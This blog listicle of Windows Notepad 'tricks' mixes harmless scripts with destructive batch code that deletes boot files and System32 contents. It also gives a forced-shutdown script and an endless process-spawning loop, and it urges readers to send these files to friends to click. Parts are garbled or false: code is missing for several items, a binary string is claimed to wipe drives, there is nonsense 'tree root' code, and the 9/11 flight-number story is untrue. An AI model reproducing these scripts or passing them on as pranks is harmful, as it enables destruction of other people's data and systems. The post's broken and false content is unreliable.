20+ Best Notepad Tricks, Hacks & Commands in 2023
20+ Best Notepad Tricks, Hacks & Commands in 2023
20+ Best Notepad Tricks, Hacks & Commands in 2023
Commands in 2023
By Manpreet Singh - July 14, 2023
Today we are here with the latest Notepad tricks and commands. These
tricks are very simple and easy to implement. With these tricks, you can
have lots of fun with your friends. Just follow the below post to proceed.
Notepad is a utility program for the Windows operating system. This utility
software helps to code various programs that can even control the system
workings through which you can perform many tricks. These tricks are
exciting, and you can use these tricks to prank your friends.
We primarily use Notepad for typing purposes, but this post will change
your experience with Notepad. These tricks are very simple and easy to
implement. With these tricks, you can have lots of fun with your friends.
Just follow the below post to proceed.
Contents [ show ]
By using this trick, you can quickly test whether your antivirus is working
perfectly or not.
Save it as test.exe and run the file and check if your antivirus detects it; then
your antivirus is working perfectly; otherwise, change your antivirus.
2) Make A Personal Log-Book or A Diary
Copy the code below, paste it into Notepad, and save it as “log.txt”.
.LOG
Every time you open this log file, you will have all the log details with the
date and time.
This is one of the Best Notepad tricks, repeatedly repeating any of the
computer screen’s messages. Copy the below code, paste it into Notepad,
and save it as “message.bat”.
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Just copy the below code and paste into Notepad and save it as
“anyname.bat”.
@echo off
msg * Hey how are you
shutdown -c “Error! You are a stupid!” -s
This trick will let you type slowly on the screen, and to do so, copy the below
code and save it with “anyname.vbs” name.
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject (“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate Notepad“”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
7) Matrix Effect
This code will give you a matrix effect on your screen just copy the below
code and paste in Notepad and save it as “anyname.bat”.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random%
goto start
This code will delete all your complex drive data. Just copy the below code
and paste into Notepad and save it as “anyname.exe”.
01100110011011110111001001101101011000010111010000 10000001
This is a very cool notepad trick, and this code will convert your text into an
audio file. Just copy the below code and paste it into Notepad and save it
as “text-to-audio.vbs”
This trick is one of the Best Notepad Tricks that will print out a tree root on
your screen. Just copy the below code, paste it into Notepad and save it as
any name in C: windows system.
{print tree root}
C:windowssystem
{print C:windowssystemwinlog
4*43″$@[455] 3hr4~
Note: If you want to stop the “.vbs” files, press ALT+CTRL+DEL on your
keyboard, open the task manager, process the section and stop the Wscript
running file there.
You can toggle the Capslock key of your keyboard by just typing the code in
Notepad. Make sure to save the file as .vbs, open the saved file, and see
what happens while using Capslock Key.
Open the Notepad, paste the code and save the file as error.vbs. When you
open the saved file, you will see an error message.
You can replace and put your message here and put your title here with your
keywords.
Open Notepad, enter the following code, and save the file as
“LEDDance.vbs”. Once you open the saved file, you will see all three LED
lights of a keyboard will start to blink repeatedly.
We have published an article regarding this. With the help of our article How
to Create a Password Protected Folder Without any Software, you can
create a password-protected folder using Notepad. Read out the post to
know how.
This is the perfect prank to annoy your friend. You need to copy and paste
the code inside the Notepad and save it with any name with the .bat
extension. You can send it to your friend and make them click.
@ECHO OFF
:TOP
START %SYSTEMROOT%\SYSTEM32\NOTEPAD.EXE
GOTO TOP
The flight number of the airplane that hit the World Trade center on 9/11
was Q33NY. You might call this trick coincidence, but it will shock you.
1. Open Notepad and type ‘Q33N’ without the quotation mark in capital
letters.
2. Now, increase the font size to 72 and change the font to Wingdings.
It would help if you had never tried this on your computer because this
method disables the mouse controls.
Well, this trick will only work on the older version of windows. You need to
open the Notepad and type “bush hid the facts” or “this app can break”.
Save it and open it again. You will see different characters instead of what
you typed. Well, this happens because of a bug that is present in the older
version of windows.
Well, open the Notepad and then browse to File>Page Setup in Notepad,
and there in the fields for header and footer, type in the following codes.
This trick will let you use the function of the enter button to happen again
and again. Well, you need to copy and paste the following code into
Notepad:
Well, this is something that you shouldn’t try on your computer unless you
are willing to lose all your data. This code will remove the files that help
your computer during the startup.
@ECHO OFF
ATTRIB -R -S -H C:\AUTOEXEC.BAT
DEL C:\AUTOEXEC.BAT
ATTRIB -R -S -H C:\BOOT.INI
DEL C:\BOOT.INI
ATTRIB -R -S -H C:\NTLDR
DEL C:\NTLDR
ATTRIB -R -S -H C:\WINDOWS\WIN.INI
DEL C:\WINDOWS\WIN.INI
Save the file in .bat file format. It will shut down your computer and will
delete all-important startup files. There’s no rollback option. Therefore you
should be aware of what you will be doing. Please don’t use the above-given
code to harm anyone.
This is one of the funniest things you can do to annoy anyone. This trick will
make hit backspace continuously. You need to copy and paste the given
code below in the notepad file:
MsgBox “Backspace again and again and AGAIN”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
To make it work, you need to save the Notepad file in .vbs format. It would
help if you used the Task Manager on Windows to stop the script.
Well, this is another notepad trick to devastate a PC. This notepad trick will
delete System32 files leading to system failure. It’s not advisable to
implement the trick, but this code has the power to shut down any working
computer within minutes.
DEL C:\WINDOWS\SYSTEM32\*.*/Q
This is another fun notepad trick that can be used to pull a prank on friends.
This notepad trick will write anything again and again and again. Users
need to manually close the process from the task manager to get out of the
typing loop. Here’s the code.
This is another notepad trick that will forcefully shut down your computer.
You must enter the given code into Notepad and save it in .bat format.
Here’s the code.
@echo off
shutdown computer
-c "sleep tight" -s
Using these notepad tricks, you can easily prank your friends, have lots of
fun with them, and have a great experience with Notepad. I hope you like
the post, don’t forget to share it with your friends and leave a comment
below about any related queries.